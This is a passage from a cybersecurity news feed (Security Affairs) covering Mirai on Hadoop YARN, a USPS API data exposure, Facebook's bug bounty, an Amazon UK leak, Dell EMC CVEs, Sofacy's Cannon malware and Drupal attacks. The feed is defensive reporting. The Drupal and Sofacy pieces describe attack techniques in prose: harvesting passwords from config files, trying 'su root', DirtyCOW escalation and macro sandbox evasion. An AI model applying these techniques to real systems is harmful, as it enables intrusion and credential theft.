The specific Mirai variant only delivers the x86 variant of the bot because much Hadoop YARN services are running on x86 Linux servers.

Other IoT Mirai variants first examine the victim device in order to deliver the proper executable (x86, x64, ARM, MIPS, ARC, etc.=

Vulnerable Linux servers are a privileged target for attackers that attempt to compromise them to carry out malicious activities by exploiting their hardware resources that are greater than IoT ones.

“The limited number of sources we’ve seen continually scanning for the Hadoop YARN vulnerability may indicate this activity is the work of a small group of attackers. Their goal is clear – to install the malware on as many devices as possible.” concluded the experts.

“Once gaining a foothold, Mirai on a Linux server behaves much like an IoT bot and begins brute-forcing telnet usernames and passwords. What’s different now is that among the small, diminutive devices in the botnet lurk fully powered Linux servers.”

Pierluigi Paganini

(Security Affairs – Mirai, Linux)

The post Experts found first Mirai bot targeting Linux servers via Hadoop YARN flaw appeared first on Security Affairs.

A flaw in US Postal Service website exposed data on 60 Million Users

US Postal Service has patched a critical bug that allowed anyone who has an account at usps.com to view and modify account details for other users

US Postal Service has patched a critical bug that allowed anyone who has an account at usps.com to view and modify account details for other users, some 60 million users were affected.

The news was first reported by the popular investigator Brian Krebs who was contacted by a researcher who discovered the issue.

The researchers, who asked to remain anonymous, reported the flaw to the USPS more than a year ago, but the company ignored him. After the public disclosure of the issue, USPS fixed the issue.

The problem resides in the USPS Informed Visibility API designed to to let businesses, advertisers and other bulk mail senders “make better business decisions by providing them with access to near real-time tracking data” about mail campaigns and packages.

“In addition to exposing near real-time data about packages and mail being sent by USPS commercial customers, the flaw let any logged-in usps.com user query the system for account details belonging to any other users, such as email address, username, user ID, account number, street address, phone number, authorized users, mailing campaign data and other information.” reads the post on KrebsonSecurity blog.

“Many of the API’s features accepted “wildcard” search parameters, meaning they could be made to return all records for a given data set without the need to search for specific terms.”

The researcher discovered that using the API to search for one specific data element (i.e. an address) it was possible to retrieve multiple accounts that shared the data.

“For example, a search on the email addresses for readers who volunteered to help with this research turned up multiple accounts when those users had more than one user signed up at the same physical address.” continues Krebs.

“This is not good,” said one anonymous reader who volunteered to help with this research, after viewing a cut-and-paste of his USPS account details looked up via his email address. “Especially since we moved due to being threatened by a neighbor.”

US Postal Service

USPS implemented a validation step to prevent unauthorized changes with some specific data fields.

When a user attempt to modify the email address associated with a specific USPS account via the API it is prompted a confirmation message sent to the email address tied to that account.

The good news is that it seems that API doesn’t expose USPS account passwords.

“The API at issue resides here; a copy of the API prior to its modification on Nov. 20 by the USPS is available here as a text file.” continues Krebs.

Such kind of flaws is very dangerous, spammers could abuse them to several malicious purposes, including phishing campaigns.

Krebs also pointed out that a vulnerability assessment of Informed Visibility was published in October 2018 by the USPS’s Office of Inspector General (OIG).

Auditors discovered several authentication and encryption flaws that evidently were underestimated.

“The USPS told the OIG it had addressed the authentication problems raised in the audit report, which appear to have been related to how data was encrypted in transit.”

Pierluigi Paganini

(Security Affairs – Hacking, US Postal Service)

The post A flaw in US Postal Service website exposed data on 60 Million Users appeared first on Security Affairs.

Facebook increases rewards for its bug bounty program and facilitate bug submission

Facebook updates its bug bounty program, it is increasing the overall rewards for security flaws that could be exploited to take over accounts.

Facebook announced an important novelty for its bug bounty, the social media giant is going to pay out as much as $40,000 for vulnerabilities that can be exploited to hack into accounts without user interaction.

The Facebook bug bounty program will cover also other companies owned by the social network giant, including Instagram, WhatsApp, and Oculus.

Vulnerabilities that require a minimum user interaction for the exploitation will be paid out $25,000.

The researchers who find vulnerabilities that can lead to a full account takeover, including access tokens leakage or the ability to access users’ valid sessions, will be rewarded an average bounty of:

* $40,000 if user interaction is not required at all, or 
* $25,000 if minimum user interaction is required.” reads the post published by Facebook.

“By increasing the award for account takeover vulnerabilities and decreasing the technical overhead necessary to be eligible for bug bounty, we hope to encourage an even larger number of high quality submissions from our existing and new white hat researchers to help us secure over 2 billion users.” 

Increasing Bounties for Account Takeover VulnerabilitiesSince 2011, our Bug Bounty program has been among the most…

Gepostet von Facebook Bug Bounty am Dienstag, 20. November 2018

The bug bounty programs are becoming crucial for companies to assess their products and infrastructure and to avoid data breaches.

In September a vulnerability in the ‘View As’ feature allowed hackers to steal access tokens that could be used by attackers to hijack accounts and access to third-party apps that used Facebook as an authentication platform.

Facebook Data Breach

Facebook revealed that hackers accessed data of 29 Million users, a number that is less than initially thought of 50 million.

Attackers accessed the names, phone numbers and email addresses of 15 million users, while for another 14 million users hackers also accessed usernames, profile details (i.e. gender, relationship status, hometown, birthdate, city, and devices), and their 15 most recent searches.

For the remaining one million users affected by the Facebook Data Breach whose “access tokens” were stolen, no data was accessed.

The hackers started on September 14 with 400,000 “seed accounts” they were controlling directly then they expanded their activity to their networks.

Facebook aims at encouraging white hat hackers in reporting critical flaws in the social media platform by increasing the awards for bug bounty program and facilitate the process to report account hacking issued.

“By increasing the award for account takeover vulnerabilities and decreasing the technical overhead necessary to be eligible for bug bounty, we hope to encourage an even larger number of high quality submissions from our existing and new white hat researchers to help us secure over 2 billion users.” concludes Facebook.

Pierluigi Paganini

(Security Affairs – Hacking, Facebook bug bounty program)

The post Facebook increases rewards for its bug bounty program and facilitate bug submission appeared first on Security Affairs.

Amazon UK is notifying a data breach to its customers days before Black Friday

Many readers of the Register shared with the media outlet an email sent from the Amazon UK branch that is notifying them an accidental data leak.

The news is disconcerting, Amazon has suffered a data breach a few days before Black Friday

Many readers of the Register shared with the media outlet an email sent from the Amazon UK branch that is notifying them an accidental data leak.

Amazon UK data leak

Amazon informed its customers that it had “inadvertently disclosed [their] name and email address due to a technical error”.

The messages include an HTTP link to the company website and read:

“Hello,

We’re contacting you to let you know that our website inadvertently disclosed your name and email address due to a technical error. The issue has been fixed. This is not a result of anything you have done, and there is no need for you to change your password or take any other action.

Sincerely, Customer Service”

The Register confirmed that the email is genuine and that was sent by Amazon UK, the press office acknowledged its authenticity.

“We have fixed the issue and informed customers who may have been impacted.” states the press office.

At the time of writing, it is unclear the number of affected customers, whether Amazon had informed the Information Commissioner’s Office.

The company did not disclose technical details of the incident, it is not known the root cause of the incident.

The Register pointed out that not only UK customers are receiving a data breach notification from the Amazon, but people from the US, the Netherlands and South Korea also claim to have received the same message.

Pierluigi Paganini

(Security Affairs – Amazon UK, hacking)

The post Amazon UK is notifying a data breach to its customers days before Black Friday appeared first on Security Affairs.

Experts found flaws in Dell EMC and VMware Products. Patch them now!

Security experts have found several vulnerabilities affecting Dell EMC Avamar and Integrated Data Protection Appliance products. They also warn that VMware’s vSphere Data Protection, which is based on Avamar, is also affected by the issues.

Dell EMC released security updates for Dell EMC Avamar Client Manager in Dell EMC Avamar Server and Dell EMC Integrated Data Protection Appliance (IDPA) to address a critical remote code execution issue and a medium open redirection flaw.

Dell acknowledged the cybersecurity firm TSS for the discovery of the flaws.

The remote code execution vulnerability, tracked as CVE-2018-11066, could be exploited by a remote unauthenticated attacker to execute arbitrary commands on the vulnerable server.

Affected versions are Dell EMC Avamar Client Manager in Dell EMC Avamar Server versions 7.2.0, 7.2.1, 7.3.0, 7.3.1, 7.4.0, 7.4.1, 7.5.0, 7.5.1, 18.1 and Dell EMC Integrated Data Protection Appliance (IDPA) versions 2.0, 2.1 and 2.2.

“Dell EMC Avamar Client Manager in Dell EMC Avamar Server versions 7.2.0, 7.2.1, 7.3.0, 7.3.1, 7.4.0, 7.4.1, 7.5.0, 7.5.1, 18.1 and Dell EMC Integrated Data Protection Appliance (IDPA) versions 2.0, 2.1 and 2.2 contain a Remote Code Execution vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability to execute arbitrary commands on the server.” reads the security advisory published.

The vulnerability received a CVSS v3 Base Score of 9.8.

The second issue, tracked as CVE-2018-11067 can be exploited by an unauthenticated attacker to redirect users to arbitrary URLs by tricking them into clicking on a specially crafted link.

Dell also disclosed a high severity information exposure vulnerability, tracked as CVE-2018-11076, that affects the above products. The flaw could be exploited by attackers to compromise the vulnerable systems, it affects Dell EMC Avamar Server versions 7.2.0, 7.2.1, 7.3.0, 7.3.1, 7.4.0 and 7.4.1 and Dell EMC Integrated Data Protection Appliance (IDPA) 2.0.

“Dell EMC Avamar and IDPA are affected by an Information Exposure vulnerability that may potentially be exploited by an attacker to compromise the affected systems.” reads the security advisory published by the company.

“Avamar Java management console’s SSL/TLS private key may be leaked in the Avamar Java management client package. The private key could potentially be used by an unauthenticated attacker on the same data-link layer to initiate a MITM attack on management console users.” 

Since VMware vSphere Data Protection (VDP) is based on the Avamar Virtual Edition, it is also affected by the flaws. The virtualization giant published a security advisory to inform its customers that the issues affect the VDP 6.0.x and 6.1.x..

Pierluigi Paganini

(Security Affairs – RCE, Dell EMC Avamar)

The post Experts found flaws in Dell EMC and VMware Products. Patch them now! appeared first on Security Affairs.

Sofacy APT group used a new tool in latest attacks, the Cannon

Sofacy APT group (aka APT28Pawn StormFancy BearSednitTsar Team, and Strontium) has a new weapon in its arsenal dubbed Cannon.

The Russia-linked APT group delivers Cannon in a spear-phishing attack that targets government organizations in North America, Europe and in a former USSR state.

Experts at Palo Alto Networks spotted a new campaign in late October and early November, spear-phishing messages used Word documents that loaded remote templates embedded with a malicious macro code.

The novelty in the last attacks is represented by the use of a tool that has not been seen before, attackers also used an uncommon technique to deliver the malware and to avoid running in a sandbox.

“Once the victim presses the Enable content button, the embedded macro is executed. The macros used for these delivery documents use a less common method of using the AutoClose function. This is a form of anti-analysis as Word will not fully execute the malicious code until the user closes the document.” reads the analysis published by Palo Alto Networks.

“If an automated sandbox exits its analysis session without specifically closing out the document, the sandbox may miss the malicious activity entirely. Once successfully executed, the macro will install a payload and save a document to the system.”

Cannon acts as a downloader and relies on emails to communicate with the C2 server and receive instructions.

The tool implements a broad range of abilities including adding persistence and creating a unique system identifier, gathering system information, grabbing snapshots of the desktop, logging into a POP3 email account to get access to attachments.

The Cannon uses three accounts hosted at a Czech service provider called Seznam to send emails. The attackers used the email account  ‘sahro.bella7[at]post.cz’ as the C2 point.

“The overall purpose of Cannon is to use several email accounts to send system data (system information and screenshot) to the threat actors and to ultimately obtain a payload from an email from the actors,” the researchers explain.

Experts reported that Sofacy hackers exploited the interest in the Lion Air airplane crash to carry out an attack. Hackers used weaponized files named ‘crash list (Lion Air Boeing 737).docx’ for their campaigns.

Sofacy Cannon tool

APT28 appears very active in this period, Cannon isn’t the unique novelty in its arsenal, the Cybaze ZLab – Yoroi team recently discovered a new variant of the infamous APT28 Lojax (aka Double-Agent). It is the latest version of the well-known rootkit Double-Agent, previously analyzed by ESET researchers.

Further details on the Cannon attacks, including IoCs, are reported in the analysis published by Palo Alto Networks,

Pierluigi Paganini

(Security Affairs – Sofacy APT, Cannot tool)

The post Sofacy APT group used a new tool in latest attacks, the Cannon appeared first on Security Affairs.

Security Affairs: Hackers target Drupal servers chaining several flaws, including Drupalgeddon2 and DirtyCOW

Hackers targeted Drupal web servers chaining some known vulnerabilities, including Drupalgeddon2 and DirtyCOW issues.

Security experts at Imperva reported an attack against Drupal Web servers running on Linux-based systems. Hackers exploited the Drupalgeddon2 flaw (CVE-2018-7600) along with other issues. The Drupalgeddon2 could be exploited to take over a website, it affects Drupal versions 6, 7 and 8.

The other flaw exploited in the attacks is the DirtyCOW issue, it is a race condition in the way the Linux kernel’s memory subsystem handles copy-on-write (COW) breakage of private read-only memory mappings. The flaw could be exploited by a local attacker to escalate privileges.

In the attack observed by Imperva, hackers attempted to hack into the Drupal servers chaining both Drupalgeddon2 and DirtyCOW, they also attempted to gain access to the target machines via system misconfigurations.

“In this post we’ll unpack a short — but no less serious — attack that affected some Linux-based systems, on October 31. Throughout the campaign, the attacker used a chain of vulnerabilities including the infamous Drupalgeddon2 and DirtyCOW, and system misconfigurations to persistently infect vulnerable Drupal web servers and take over user machines.” reads the analysis published by Imperva.

The new attack stands out because hackers would gain persistence on the target, they opted for a technique to easily re-infect a vulnerable server in case the process is terminated or after a server restart, or run an additional malicious code.

The attackers create a word list by locating all of Drupal’s settings files and extracting all of the lines that contain the word “pass”.

This attack could be effective in case administrators leave ‘root’ as the default user to connect from the web application to the database. The attackers can attempt to use the command ‘su root’ to change the user to root.

drupal servers attacks

If the administrator did not leave the root passwords in the configuration files, the hackers attempt to exploit the DirtyCOW flaw to escalate privileges to root.

“If the attacker succeeds in changing the user, they can proceed to download the secondary payload ‘sshdstuff’ and execute (more details below).” continues the post.

“If the administrator was careful and didn’t leave root passwords in the configuration files, this technique fails, and the attacker tries to exploit the DirtyCOW bug to escalate their privileges to root.”

The attackers attempted to use three different implementations of DirtyCOW exploit, one of which is raw format (C source code file) and was being compiled at runtime.

One of the